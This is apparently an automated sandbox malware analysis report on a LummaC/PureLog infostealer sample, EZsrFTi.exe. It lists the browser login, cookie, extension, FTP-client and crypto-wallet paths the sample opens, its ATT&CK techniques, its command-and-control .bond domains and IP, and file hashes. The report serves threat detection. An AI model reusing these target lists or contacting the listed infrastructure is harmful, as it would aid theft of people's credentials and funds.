Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: EZsrFTi.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: EZsrFTi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EZsrFTi.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EZsrFTi.exe.39e9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EZsrFTi.exe	28%	Virustotal		Browse
EZsrFTi.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://sobrattyeu.bond/pi	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/	0%	Avira URL Cloud	safe
stripedre-lot.bond	0%	Avira URL Cloud	safe
pain-temper.bond	0%	Avira URL Cloud	safe
immolatechallen.bond	0%	Avira URL Cloud	safe
growthselec.bond	0%	Avira URL Cloud	safe
sobrattyeu.bond	0%	Avira URL Cloud	safe
jarry-deatile.bond	0%	Avira URL Cloud	safe
crookedfoshe.bond	0%	Avira URL Cloud	safe
jarry-fixxer.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/api	0%	Avira URL Cloud	safe
strivehelpeu.bond	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sobrattyeu.bond	104.21.64.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jarry-deatile.bond	true	Avira URL Cloud: safe	unknown
immolatechallen.bond	true	Avira URL Cloud: safe	unknown
stripedre-lot.bond	true	Avira URL Cloud: safe	unknown
jarry-fixxer.bond	true	Avira URL Cloud: safe	unknown
sobrattyeu.bond	true	Avira URL Cloud: safe	unknown
pain-temper.bond	true	Avira URL Cloud: safe	unknown
crookedfoshe.bond	true	Avira URL Cloud: safe	unknown
growthselec.bond	true	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/api	true	Avira URL Cloud: safe	unknown
strivehelpeu.bond	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sobrattyeu.bond/	EZsrFTi.exe, 00000004.00000002.2540265272.0000000003C40000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/pi	EZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	sobrattyeu.bond	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592068
Start date and time:	2025-01-15 18:10:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EZsrFTi.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 31 Number of non-executed functions: 56
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.68, 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:11:05	API Interceptor	8x Sleep call for process: EZsrFTi.exe modified
12:11:23	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	NVIDIAShare.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
	gem2.exe	Get hash	malicious	Unknown	Browse	securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sobrattyeu.bond	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
	Adobe-Acrobat-Pro-2025.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ	Get hash	malicious	Unknown	Browse	104.21.79.87
	DOCU800147001.exe	Get hash	malicious	GuLoader	Browse	104.21.32.1
	firstontario.docx	Get hash	malicious	Unknown	Browse	1.1.1.1
	lummm_lzmb.exe	Get hash	malicious	LummaC	Browse	104.21.67.165
	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse	104.21.32.1
	https://tinyurl.com/Amconconstruction	Get hash	malicious	Unknown	Browse	104.17.25.14
	Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	lummm_lzmb.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	L#U043e#U0430d#U0435r.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.64.1
	Adobe-Acrobat-Pro-2025.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.64.1
	MotivatedFunded.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	Set-Up.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	104.21.64.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EZsrFTi.exe_8bde2ce7b05c3e4d9823037f951ae1af74e29a_082384c3_4539f800-7d38-42ed-b13d-55fd9ae4ddfd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9060038100507476
Encrypted:	false
SSDEEP:	96:ynFhX5oe0c9sggKjTOAqyS3QXIDcQlc6VcEdcw3V+BHUHZ0ownOgHkEwH3dEFYAz:wTJoe0c98A0LR3EauOzuiFfZ24IO8m
MD5:	C1EA77C174EF9DD3DAAF96FF92F67308
SHA1:	74BE34262591D28195A3EB9E2BAA54B9C64DCEC3
SHA-256:	0E974B58A4891DE1A3A4D990368D0671C1B7BCDBE60BEEBCA479E9B78200C70E
SHA-512:	710C755FD28F5F461F218B5AB4513D266071E5A9160DCBAE73D7697611B4351979CDA20AB91BBEDE6E27D3BDFA437F27D79FB375F113A29A1696B6FCEAC5E6B2
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.3.4.6.6.4.6.6.0.0.1.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.3.4.6.6.5.8.4.7.5.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.3.9.f.8.0.0.-.7.d.3.8.-.4.2.e.d.-.b.1.3.d.-.5.5.f.d.9.a.e.4.d.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.3.3.5.6.7.0.-.9.5.e.3.-.4.6.4.b.-.b.4.c.d.-.6.1.0.0.3.f.e.1.d.1.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.Z.s.r.F.T.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.3.-.4.4.7.f.-.4.0.7.5.7.0.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.7.9.c.6.5.b.0.b.7.8.d.7.d.2.8.7.2.9.e.3.e.c.e.9.9.e.8.8.8.c.a.3.a.c.d.d.4.7.e.7.!.E.Z.s.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB06.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jan 15 17:11:04 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	165980
Entropy (8bit):	3.8834800197683697
Encrypted:	false
SSDEEP:	1536:2xaYX2AftW3d5GtTcTSVXsQ0pN4uE2aO497RCDYuBojRpLTg3B9Sb:2cXAOyG4uEq49gMpLTgx9S
MD5:	D304F23484F023B7F044BE40310FFE95
SHA1:	894FB80D16209B5E5FFA20D2BA88223EB0874545
SHA-256:	95BCB02960B8D816473E1DABEE6605DC8DEC7F3468FCFFB4D9924032A601EDA4
SHA-512:	1EAD925090D77449DB44392C2937E28D64EE654BB8A72EE85B2DE47E77A40127EEC35C162E414BEDEA195040627623490CD1F02F44BEAFD221FF18DCEBCE2F2A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......(.g....................................$...........4...N0..........`.......8...........T............$...c..........8...........$...............................................................................eJ..............GenuineIntel............T...........'.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC4F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.6923975730946084
Encrypted:	false
SSDEEP:	192:R6l7wVeJqv6+WB6YeYSU92AwgmfhVJQpr789b5Jsf6Tm:R6lXJS6Z6YBSU9ugmfhVJp5if3
MD5:	4E47FAA92BA22D13F1EF05E4BC743A2E
SHA1:	EB01A8A6970A7D2EE316B89C5D3B22C09BEEE41A
SHA-256:	56E3792C785B5D9770F2A8B120ACC5CD1999B9AF2E85EA7BEFA6F064DAAA94B3
SHA-512:	0EE6AC289E6765ECB1E69F15DD143F96606F8AB4A8BDE8E2506DA552D94754EACF0909570D7B5595E9F0A1DCE12C79B279E845818D1782EABF922D3B245B964C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC6F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.454138419477644
Encrypted:	false
SSDEEP:	96:uIjfaI7VN7VrFJBggfbKygfl5QcSe0S6d:uIWYVN75PBgg7g/xSFS4
MD5:	67630439E54FCF39B3E6089412628C31
SHA1:	FB66FAC3420D9D934F47507EEE34CB5EF10042C6
SHA-256:	F2A2C72F299478B77517816CD9C13B6CC5B096AE0ACE466909F990675CD2833B
SHA-512:	3CF4C19FAD35173EDC3F0E668F17C57A977830270FFEB0AB687CC87BC1E312EE2495113E50988568032D650E21548FDDB20FE7D97404AE67B00EBEDDAC9A47B6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677293" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.298865512078589
Encrypted:	false
SSDEEP:	6144:aECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lR6SD6VJSRiT:HCsL6seqD5Sm6SWVARi
MD5:	AE6421EA78D8B678A2265828E5DED4BB
SHA1:	386E3711C197D8739651EC83137B9787CA97816B
SHA-256:	96BA84652E8A30D560FABD28D40351107AA24D79FB3DDC588C1C929B6B71A0D8
SHA-512:	67E931F55B7D8646833C1C8322925BB32687BE4CF229D4481B2E6AF34785C86B27B8E885400B0652AEDF35DBC63CB2C36A2A0354B33973E114B419C79C6674CC
Malicious:	false
Reputation:	low
Preview:	regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@.upg..............................................................................................................................................................................................................................................................................................................................................(-.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.868327806136689
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	EZsrFTi.exe
File size:	376'320 bytes
